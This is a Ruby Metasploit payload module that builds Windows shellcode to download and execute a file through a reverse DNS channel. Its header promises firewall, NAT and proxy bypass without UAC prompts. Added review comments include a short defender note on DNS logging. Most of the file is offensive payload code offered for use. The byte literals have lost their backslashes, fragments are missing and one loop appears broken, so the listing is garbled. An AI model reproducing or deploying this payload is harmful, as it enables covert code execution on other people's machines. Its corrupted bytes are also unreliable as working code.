##
#
# Shellcode: download and execute a file via a reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * No UAC interaction needed (svchost.exe makes the requests via getaddrinfo)
# * Firewall/Router/NAT/Proxy bypass via reverse connection (like dnscat does, but without sockets, and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
#       [DSecRG]
#     a.sintsov [sobachka] dsecrg.com
#     dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
#       does not work on XP/2003 because there is no IPv6 by default.
#       can work on XP/2003 if IPv6 is installed
#       (it does not need to be enabled, just installed)

require 'msf/core'

module Metasploit3

# Single-stage Windows payload module. Per the file header, the stage
# fetches and runs a file over a DNS-based channel (name resolution rather
# than sockets). The Ruby here only assembles the final byte string from the
# fixed fragments under 'Payload' plus two operator-supplied options.
#
# Defender note: because the header describes the transport as getaddrinfo
# calls issued by svchost.exe with no socket of its own, resolver / DNS query
# logging for the configured DOMAIN is where this activity would surface;
# connection-oriented network telemetry would not show it.
include Msf::Payload::Windows
include Msf::Payload::Single

# Registers module metadata and the datastore options used by generate_stage.
#
# 'Payload' holds three raw fragments ('Begin', 'Payload1', 'Payload2');
# generate_stage splices the DOMAIN and FILE values between them.
# NOTE(review): the escape sequences in the literals below appear to have
# lost their backslashes during extraction (e.g. "xeb" where a byte escape
# would be expected), so this listing is not byte-faithful as shown.
def initialize(info = {})
super(update_info(info,
'Name'          => 'DNS_DOWNLOAD_EXEC',
'Version'       => '0.01',
'Description'   => 'Download and Exec (via DNS)',
'Author'        => [ 'Alexey Sintsov' ],
'License'       => MSF_LICENSE,
'Platform'      => 'win',
'Arch'          => ARCH_X86,
'Payload'       =>
{
'Offsets' =>{ },

'Begin' => "xebx02xebx7Axe8xf9xffxffxffx47x65x74x50x72x6Fx63x41x64x64x72x65x73x73xFFx47x65x74x54x65x6dx70x50x61x74x68x41xFFxFFxFFxFFxFFxFFxFFxFFx57x69x6Ex45x78x65x63xFFx45x78x69x74x54x68x72x65x61x64xffx4Cx6Fx61x64x4Cx69x62x72x61x72x79x41xFFx77x73x32x5fx33x32xFFx57x53x41x53x74x61x72x74x75x70xFFx67x65x74x61x64x64x72x69x6ex66x6fxFFx6dx73x76x63x72x74xFFx66x6fx70x65x6exFFx66x77x72x69x74x65xFFxEBx13x66x63x6cx6fx73x65xFF",

'Payload1' =>            "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",

'Payload2' =>    "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"+"x68x2fx63x20x22x68x63x6dx64x20x8bxccx41x8ax01x84xc0x75xf9xc6x01x22x88x41x01"+"x33xc0x8bxccx50x51xffx56x1cx50xffx56x18"

}
))

# We use rtlExitThread(0)
# EXITFUNC is removed because the stage has a fixed exit path; the generic
# exit-technique option would have no effect here.
deregister_options('EXITFUNC')

# Register the domain and cmd options
# DOMAIN: the name the stage resolves against (header limit: 9 bytes).
# FILE:   extension of the file written by the stage (default 'vbs').
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end

#
# Constructs the payload
#
# Returns the concatenation
#   Begin + "x2e" + DOMAIN (padded to 10 with "xFF") + Payload1
#   + FILE (padded to 4 with "x01", each byte incremented by one) + Payload2
# as the literals are written in this listing. Reads only datastore['DOMAIN']
# and datastore['FILE']; no other state is consulted.
def generate_stage
domain  = datastore['DOMAIN'] || ''
extens  = datastore['FILE'] || 'vbs'

# "x66x79x66x01"
# Original length of the extension; assigned but not referenced below as shown.
extLen=extens.length

# Right-pad the extension to exactly 4 characters.
while extens.length<4
extens=extens+"x01"
end

# Add one to each byte of the extension in place.
# NOTE(review): `while i` is always truthy in Ruby (0 is truthy), so this
# condition looks truncated in the listing; as written the loop ends only
# when `extens[i]` is nil and `.ord` raises.
i=0
while i
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end

# Right-pad the domain to 10 characters.
while domain.length<10
domain=domain+"xFF"
end

# Leading separator byte before the domain.
domain="x2e"+domain

# Final stage: fixed fragments with the operator values spliced between them.
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']

return payload
end

end
